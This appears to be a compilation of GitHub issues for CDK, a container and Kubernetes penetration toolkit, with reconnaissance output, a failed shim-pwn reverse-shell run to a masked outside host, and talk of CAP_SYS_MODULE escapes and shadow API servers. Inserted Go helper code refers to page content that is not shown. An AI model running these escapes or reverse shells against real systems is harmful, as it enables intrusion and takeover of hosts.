2021/06/24 19:45:25 failed to dial Google Cloud API.
2021/06/24 19:45:26 failed to dial Tencent Cloud API.
2021/06/24 19:45:27 failed to dial OpenStack API.
2021/06/24 19:45:27 failed to dial Amazon Web Services (AWS) API.
2021/06/24 19:45:28 failed to dial ucloud API.

[Information Gathering - Sensitive Files]
	/.bashrc - /etc/skel/.bashrc
	/docker.sock - /etc/systemd/system/sockets.target.wants/docker.socket
	/.bash_history - /home/xsw/.bash_history
	/.bashrc - /home/xsw/.bashrc
	.git/ - /home/xsw/metarget/.git/HEAD
	.git/ - /home/xsw/metarget/.git/branches
	.git/ - /home/xsw/metarget/.git/config
	.git/ - /home/xsw/metarget/.git/description
	.git/ - /home/xsw/metarget/.git/hooks
	.git/ - /home/xsw/metarget/.git/index
	.git/ - /home/xsw/metarget/.git/info
	.git/ - /home/xsw/metarget/.git/logs
	.git/ - /home/xsw/metarget/.git/objects
	.git/ - /home/xsw/metarget/.git/packed-refs
	.git/ - /home/xsw/metarget/.git/refs
	/docker.sock - /lib/systemd/system/docker.socket
	/docker.sock - /run/docker.sock
	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/docker.socket.dsh-also
	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket

[Information Gathering - ASLR]
2021/06/24 19:45:49 /proc/sys/kernel/randomize_va_space file content: 2
2021/06/24 19:45:49 ASLR is enabled.

[Information Gathering - Cgroups]
2021/06/24 19:45:49 /proc/1/cgroup file content:
	11:pids:/init.scope
	10:cpuset:/
	9:hugetlb:/
	8:memory:/init.scope
	7:devices:/init.scope
	6:freezer:/
	5:cpu,cpuacct:/init.scope
	4:perf_event:/
	3:net_cls,net_prio:/
	2:blkio:/init.scope
	1:name=systemd:/init.scope

2. Full error message

root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
2021/06/25 03:01:57 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/25 03:01:57 exploit failed.

[Exploit] Implement actual CAP_SYS_MODULE escape in CDK

From: @nikitastupin in #20

The reason why I didn't implement the actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires a kernel module built specifically for it. Given how many kernel versions and architectures are out there, I see several options:

  • To write detailed instructions on how to build a kernel module for an arbitrary kernel version and architecture and put them in CDK.
  • To prebuild kernel modules for the most popular distributions (e.g. Ubuntu 20.04), include them in the CDK binary and leave a note on how to build the kernel module for other kernel versions.

Great thanks to Nikita.

Suggestion to change a few things, e.g. allow specifying the apiserver URL

In a recent project I found a Kubernetes port with unauthorized access, but the target URL was not in the pod's environment variables, so many subsequent functions could not be used.

import (
	"errors"
	"net"
	"os"
)

// ApiServerAddr resolves the API server address solely from the environment
// variables that Kubernetes injects into every pod; there is no way to pass
// an address by hand.
func ApiServerAddr() (string, error) {
	protocol := ""
	host, port := os.Getenv("KUBERNETES_SERVICE_HOST"), os.Getenv("KUBERNETES_SERVICE_PORT")
	if len(host) == 0 || len(port) == 0 {
		text := "err: cannot find kubernetes api host in ENV"
		return "", errors.New(text)
	}
	// 8080 and 8001 are treated as the legacy plaintext ports, anything else as TLS.
	if port == "8080" || port == "8001" {
		protocol = "http://"
	} else {
		protocol = "https://"
	}

	return protocol + net.JoinHostPort(host, port), nil
}

I suggest making this more flexible
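One way to add the flexibility the issue asks for, as an added example that is not CDK's own code: resolve the address with a precedence order (explicit override first, then an environment variable, then the in-cluster variables the original function reads) and normalize whatever was given into a scheme-qualified URL. The override parameter and the CDK_API_SERVER variable name are assumptions of this example, not existing CDK options; the 8080/8001 plaintext heuristic is kept from the original code. The environment is injected as a function so the resolver can be tested without touching the real environment.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"os"
	"strings"
)

// resolveAPIServer returns the API server base URL. Precedence:
//  1. override (e.g. from a CLI flag; passed in as a parameter here),
//  2. the hypothetical CDK_API_SERVER environment variable (assumed name),
//  3. KUBERNETES_SERVICE_HOST/PORT, exactly as the original ApiServerAddr does.
// getenv is normally os.Getenv; tests pass a lookup into a map.
func resolveAPIServer(override string, getenv func(string) string) (string, error) {
	for _, candidate := range []string{override, getenv("CDK_API_SERVER")} {
		if candidate != "" {
			return normalizeAPIServer(candidate)
		}
	}
	host, port := getenv("KUBERNETES_SERVICE_HOST"), getenv("KUBERNETES_SERVICE_PORT")
	if host == "" || port == "" {
		return "", errors.New("err: cannot find kubernetes api host in ENV and no override given")
	}
	return normalizeAPIServer(net.JoinHostPort(host, port))
}

// normalizeAPIServer accepts "host:port", "http://host:port" or
// "https://host:port" (optionally with a path, which is dropped) and returns
// "scheme://host:port". Without a scheme, ports 8080 and 8001 are treated as
// plaintext and everything else as TLS, matching the original heuristic.
func normalizeAPIServer(raw string) (string, error) {
	if !strings.Contains(raw, "://") {
		host, port, err := net.SplitHostPort(raw)
		if err != nil {
			return "", fmt.Errorf("expected host:port or URL, got %q: %w", raw, err)
		}
		scheme := "https"
		if port == "8080" || port == "8001" {
			scheme = "http"
		}
		raw = scheme + "://" + net.JoinHostPort(host, port)
	}
	u, err := url.Parse(raw)
	if err != nil || u.Host == "" || (u.Scheme != "http" && u.Scheme != "https") {
		return "", fmt.Errorf("invalid api-server address %q", raw)
	}
	return u.Scheme + "://" + u.Host, nil
}

func main() {
	addr, err := resolveAPIServer("", os.Getenv)
	fmt.Println(addr, err)
}
```

Rejecting schemes other than http and https keeps a mistyped override from being silently sent to the wrong transport, and IPv6 hosts work because SplitHostPort and JoinHostPort handle the bracketed form.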

k8s-shadow-apiserver response check is wrong

Please describe the issue in detail

When using cdk to deploy the shadow api server, the code checks selfLink, but the podlist does not contain that field
k8s version 1.20.6

Note: Before submitting an issue, please check whether the CDK you are using is the latest version, otherwise there may be some bugs that have already been fixed in the latest version.

2. Please post the full error message, which can be command line output, software error message, screenshots, etc.

./cdk run k8s-shadow-apiserver default

image
image
Attention, please post the full error message, don't paste only the last line of the error!
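Both this issue and the earlier note about Kubernetes v1.20 dropping metadata.selfLink point at the same weakness: validating an API server response by looking for a field the server no longer sends. The following is an added example (not CDK's own code) of deciding whether a body is a usable PodList for the expected namespace from the fields that every server version does return, kind, apiVersion and the items' own metadata, and of recognizing a kind: Status error body explicitly rather than as "no selfLink". The two sample bodies are constructed; the pod names and the 403 Status text are taken from outputs quoted elsewhere on this page.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// podList is the subset of a v1 PodList the check relies on. metadata.selfLink
// is deliberately not modelled: servers from v1.20 on omit it by default.
type podList struct {
	Kind       string `json:"kind"`
	APIVersion string `json:"apiVersion"`
	Items      []struct {
		Metadata struct {
			Name      string `json:"name"`
			Namespace string `json:"namespace"`
		} `json:"metadata"`
	} `json:"items"`
}

// status is the shape the API server uses for errors (kind: Status).
type status struct {
	Kind    string `json:"kind"`
	Status  string `json:"status"`
	Message string `json:"message"`
	Code    int    `json:"code"`
}

// validatePodList returns the pod names if body is a well-formed v1 PodList
// whose items all live in namespace; otherwise it returns a descriptive error.
func validatePodList(body []byte, namespace string) ([]string, error) {
	// An error response is JSON too, so classify it first instead of treating
	// "field missing" as the failure signal.
	var st status
	if err := json.Unmarshal(body, &st); err == nil && st.Kind == "Status" {
		return nil, fmt.Errorf("api-server returned %s (%d): %s", st.Status, st.Code, st.Message)
	}
	var pl podList
	if err := json.Unmarshal(body, &pl); err != nil {
		return nil, fmt.Errorf("response is not JSON: %w", err)
	}
	if pl.Kind != "PodList" || pl.APIVersion != "v1" {
		return nil, errors.New("unexpected kind/apiVersion, expected v1 PodList")
	}
	names := make([]string, 0, len(pl.Items))
	for _, p := range pl.Items {
		if p.Metadata.Namespace != namespace {
			return nil, fmt.Errorf("pod %q is in namespace %q, expected %q", p.Metadata.Name, p.Metadata.Namespace, namespace)
		}
		names = append(names, p.Metadata.Name)
	}
	return names, nil
}

// Constructed responses: a v1.20-style PodList without selfLink, and the
// anonymous-request 403 quoted in the evaluate output on this page.
const sampleList = `{"kind":"PodList","apiVersion":"v1","metadata":{"resourceVersion":"1"},
 "items":[{"metadata":{"name":"kube-apiserver-ubuntu18","namespace":"kube-system"}},
          {"metadata":{"name":"coredns-567c556887-2jqtm","namespace":"kube-system"}}]}`
const sampleForbidden = `{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403}`

func main() {
	names, err := validatePodList([]byte(sampleList), "kube-system")
	fmt.Println(names, err)
	_, err = validatePodList([]byte(sampleForbidden), "kube-system")
	fmt.Println(err)
}
```

An empty items list still validates, so a caller that needs a particular pod (for instance kube-apiserver-*) should check the returned names rather than the absence of an error.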

[doc] document about thin version and upx version

A document explaining the differences between the release binaries is needed (memo, to be written soon).

In the current major release we added a lightweight version; it is prepared for short-lived container shells such as Serverless functions. We added build tags in the source code and cut a few exploits to make the binary lighter, just a 2MB file, but it contains 90% of CDK's functions. You may also pick useful exploits from the CDK source code to build your own lightweight binary.

image
